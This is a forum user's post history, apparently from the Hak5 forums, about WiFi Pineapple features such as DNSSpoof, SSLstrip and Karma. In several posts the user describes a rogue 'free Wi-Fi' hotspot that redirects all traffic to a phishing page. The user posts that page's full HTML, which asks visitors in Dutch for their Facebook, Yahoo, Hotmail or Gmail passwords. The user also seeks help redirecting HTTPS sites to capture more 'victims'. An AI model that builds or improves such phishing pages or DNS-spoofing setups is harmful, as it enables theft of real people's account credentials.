Aprex
-
Posts
52 -
Joined
-
Last visited
Posts posted by Aprex
-
-
Can't wait for this infusion. It's going to be very handy.
-
Exactly as theigingerone said, your image links are wrong.
By using "./image.jpeg", you are saying the image is in the current directory. So it looks for images in /x/y/z if that is the URL you have gone to.
To fix it, remove the dot: "/image.jpeg".
Nothing wrong with DNSSpoof, or you wouldn't see the page at all.
Best regards,
Sebkinne
Thanks! This solved my issue. Why do they work with websites without a /xxx behind it?
-
Okay so in my spoofhost I have "172.16.42.1 *.*"
I created my own phishing page asking for Email or Facebook login before proceeding to use my "free internet". I don't have internet to share so after they logged it in will say the hotspot is in maintainence. Problem is, the phishing page has some images to make it look professional but when you browse to a website with a / behind it, it won't show the images.
Here is an example.
Check out the URL bar difference on both images:
http://i.imgur.com/EAi0ELY.png
http://i.imgur.com/bvyAXfM.png
I also tried on my iPhone and it does the exact same thing. Any help here?
This is my index.html (the images are in /www/ like the index.html)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Gratis Internet | Wi-Fi Alliance</title> </head> <body> <center> <br /> <img src="./wifi-alliance.jpg" width="20%"><br /> <br /> <p><Strong>Deze gratis Wi-Fi hotspot is uw aangeboden door de Wi-Fi alliance. U kunt onze hotspots op drukbevolkte plekken in Nederland en België vinden.</Strong></p> <p><Strong>Voer hier voordat u verder gaat uw Facebook of Email gegevens in om u als gebruiker te verifiëren. Hierna kunt u zorgeloos gratis 60 minuten internetten. </Strong></p><br /> <form action="./process-form-data.php" method="post"> <fieldset> <table width="320"> <tr> <td colspan="1" align=left>Email</td> <td colspan="3" width="100%"><input style="width:100%;" name="login" type="text"/></td> </tr> <tr> <td colspan="1" align=left>Wachtwoord</td> <td colspan="3" width="100%"><input style="width:100%;" type="password" name="password" /></td> </tr> <tr> <td><img src="./facebookLogo.jpg" /></td> <td><img src="./yahoo.png"/></td> <td><img src="./HotmailLogo.jpg"/></td> <td><img src="./gmail.jpg"/></td> </tr> <tr> </tr> <tr></tr> <td align=center ><input type="submit" value="Login" name="facebook" /></td> <td align=center ><input type="submit" value="Login" name="yahoo" /></td> <td align=center ><input type="submit" value="Login" name="hotmail" /></td> <td align=center ><input type="submit" value="Login" name="gmail" /></td> </table> </fieldset> </form> </center> </body> </html> -
I would be very interested in this.
-
What certificate errors? The whole point is that the web site uses http as far as the end-user can tell, so there is no cert checking going on.
There is no http version of the website required for sslstrip to work, though you do need a launch point to go from http to https.
Of course there needs to be an HTTP version of the website, else it can't redirect/strip. For example Gmail. It doesn't have an HTTP version so SSLStrip doesn't work for it. If you use Chrome or Firefox, they will give you certificate errors for loads of websites.
-
I know what you mean and it's very annoying indeed. I also have this problem. I'd love a fix or way around.
-
Isn't SSLStrip dead because of all the cerfiticate errors and websites not having http versions anymore?
-
It won't jam the pineapple AP if you just whitelist it. Also, Karma can only spoof unencrypted (open) networks. Also, newer devices won't fall for Karma's fake networks.
-
This is amazing! Thank you so much! I'm so freaking happy the Hak5 team is pushing out so great updates. I love this community.
-
Will it be able to find any missing aircrafts? lol
-
How would you connect to the AP of the pineapple if the drone is too far away?
-
No. The whole point of https is to secure the site. If browsers just ignored that the site's ssl cert isn't getting passed there'd be no point of secure sites to begin with.
A sites SSL certificate? My hotspot doesn't even have internet access. I just have phishing pages for most popular websites. It has nothing to do with accessing the actual website. It just needs to redirect to my phishing page if it says https infront of it. It has nothing to do with https at all..
-
Awesome! Thank you for this!
-
dnsspoof does not work on https sites. Sometimes sites are cached so that causes problems... it's not perfect but it does work. So I'm not sure what kind of update you're expecting.
An update to support https. I mean, it doesn't actually have to do anything with https itself, it just doesn't redirect when a browser puts https infront of it. Isn't this just a simple line of code to also redirect a website that has https infront of it?
Also, like I said, an update where actually ALL websites get redirected to my pineapple, just half. Or 75%.
-
DNSSpoof does not redirect when https is infront of the URL. A lot of browsers put this infront of the URL automaticly. Also, some websites I can just visit and other redirect to the right page? I have 172.16.42.1 * set correctly yet my victims still manage to browse some web pages? On my iPhone the pictures won't load..
It still has a lot of bugs, can ANYONE give me a status update about this?
-
Bully doesn't work. It will just say "wps currently not running..".
-
Any changelog? I can't wait :)
-
As well all know Karma doesn't work with newer devices. I heard some rumors of people working on Karma to support more devices. Is this true and can we expect an update on Karma? This would be awesome.
[Support] SSLstrip
in Mark V Infusions
Posted
People keep saying this but does this mean that this is going to be impossible to work on the Pineapple? Is not one working on porting it?